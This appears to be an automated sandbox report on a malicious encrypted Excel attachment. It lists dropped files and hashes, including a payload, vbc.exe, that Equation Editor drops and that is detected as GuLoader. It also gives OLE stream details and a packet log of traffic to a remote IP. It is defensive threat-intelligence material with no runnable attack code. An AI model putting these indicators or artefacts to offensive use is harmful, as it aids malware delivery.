C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DE6E00F3.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.812380894935209
Encrypted:	false
SSDEEP:	3072:Q34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:q4UcLe0JOcXuunhqcS
MD5:	7EDE5CDF9E711B59F6F7574F11B44421
SHA1:	0822C61BC1738315D9292ADC21C2F83750E1EB7A
SHA-256:	D82F09FCCFF29DC4EC8E49582BD3535E8BA8CB0E212033AF379C393987FB2430
SHA-512:	0085E9CCDC22118FA7B8A365F483E25D46FBAB57A419F061880F93E263F52EECB499EB0FEB264115BE1ED64A4F6891E3E9ADA513463B2F87172CAF73D6B312C3
Malicious:	false
Preview:	....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................z$.......-z.z.@..%...............0........N.P0...(................N.P0...(... ....y.z(...0... .........L..z.z........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X...(...\.........L....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4ADC8AB.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso3759.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso375A.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso375B.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoDFD4.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE004.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE005.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PC bitmap, Windows 3.x format, 20 x 20 x 24
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	5.835900066445133
Encrypted:	false
SSDEEP:	24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
MD5:	A3C62E516777C15BF216F12143693C61
SHA1:	277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
SHA-256:	616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
SHA-512:	AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
Malicious:	false
Preview:	BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................

C:\Users\user\Desktop\~$new order requirment-21 July.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	246888
Entropy (8bit):	4.635501230509535
Encrypted:	false
SSDEEP:	3072:MtU2Qf98DH332/jEvQuUZZNzPmhd3QPBP:KU2Qf9iXm/jduUNzPKNC
MD5:	19CAC1EE3A6E5E9F83054616F5D5CE6F
SHA1:	5B7F16098760F887B0BDC5FEE9223D022E0597FB
SHA-256:	3709110CC04E0EAFFE10BEC5E8A5C82B858BEE4195975E7BCD30C50B246F56C3
SHA-512:	75D7CC20B44224AB616B9D4E6EDD2C527C4245F5752430A08ED7A68A3D1596BFE5F9A16A447A57E8CBBE965B7377C6259F481C6A1AE8D262238AD25DCE14A0AD
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
Antivirus:	Antivirus: Virustotal, Detection: 15%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....QU.................0...p......0........@....@.................................bq......................................T0..(....P...T..........P.......................................................(... ....................................text....$.......0.................. ..`.data........@.......@..............@....rsrc....T...P...`...P..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.994336797755052
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	new order requirment-21 July.xlsx
File size:	1242112
MD5:	25f7735ff71a70abf4bb508d2711f50b
SHA1:	7f40fff223019a3e399ca0ae0990afaf2695e93b
SHA256:	821f2880a8218afc0d30711b46f7d28e9adb2cd6c3db88b881de91090e72337f
SHA512:	27cd8ad83792a767a37ad9c0f22c5af3ab065bed8ec83ed577597f60fc8158e2fff0c83ab3f539e8e61a711f8ac0e35a9aa0534c3d8ae4fa054397c2c6b2bc4d
SSDEEP:	24576:0V3MqFeVaaE5+qrvwVJ/x9O+w7qqbxWKAJsxhqR90CPYFZz1qvC:VeeV1Hxkf7pbx9AJohqRezZz1EC
File Content Preview:	........................>.......................................................................................................\|.......~......................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "new order requirment-21 July.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1228568

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	1228568
Entropy:	7.99879866952
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . K { . F . . 3 . . . . . 0 . . . . . V 4 J . . . . . . . . . . . . a ` . . . ^ . . H . . ' ` . . ` i . . . = . . . . T P . ( . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . . . . . . l Z . . A . h . $ . . .
Data Raw:	0a bf 12 00 00 00 00 00 e1 4b 7b 18 46 d8 8f 33 10 94 dc 88 c9 30 c1 1e 9d 80 1c 56 34 4a 83 fd f2 c7 03 dc e3 10 d6 17 ad e8 61 60 de 97 a9 5e fa 9d 48 a7 82 27 60 0b 86 60 69 b6 83 af 3d f8 c0 ff f1 54 50 03 28 1f 41 a5 68 96 24 94 f8 d2 a4 c0 cd de 6c 5a 87 d3 41 a5 68 96 24 94 f8 d2 a4 c0 cd de 6c 5a 87 d3 41 a5 68 96 24 94 f8 d2 a4 c0 cd de 6c 5a 87 d3 41 a5 68 96 24 94 f8 d2

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.52198973456
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . + 7 s . > . . } . . . . . . * . . * H . : i } t . j . B . . . . h . . . ? < . . . T . . . . ] \\ M . . . . . . . . O . . . . . y
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 21, 2021 08:30:40.823514938 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.120740891 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.120850086 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.121226072 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.422100067 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.422137022 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.422158003 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.422182083 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.422262907 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.422288895 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.746315002 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.746360064 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.746391058 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.746416092 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.746526957 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.746558905 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.746629000 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.746655941 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.746679068 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.746682882 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.746707916 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.746737003 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:41.747028112 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:41.747091055 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077022076 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077045918 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077061892 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077085018 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077106953 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077126980 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077162981 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077172041 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077194929 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077217102 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077239990 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077241898 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077260017 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077264071 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077264071 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077286005 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077308893 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077310085 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077338934 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077343941 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077357054 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077358961 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077361107 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077363014 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077366114 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077385902 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.077423096 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.077761889 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.079900980 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374232054 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374264002 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374281883 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374298096 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374317884 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374336004 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374366045 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374382973 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374398947 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374397993 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374414921 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374432087 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374433994 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374438047 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374448061 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374448061 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374468088 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374480963 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374485016 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374485016 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374500036 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374501944 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374519110 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374526024 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374533892 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374536037 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374552011 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374571085 CEST	80	49165	180.214.239.39	192.168.2.22
Jul 21, 2021 08:30:42.374587059 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374599934 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374603033 CEST	49165	80	192.168.2.22	180.214.239.39
Jul 21, 2021 08:30:42.374613047 CEST	49165	80	192.168.2.22	180.214.239.39
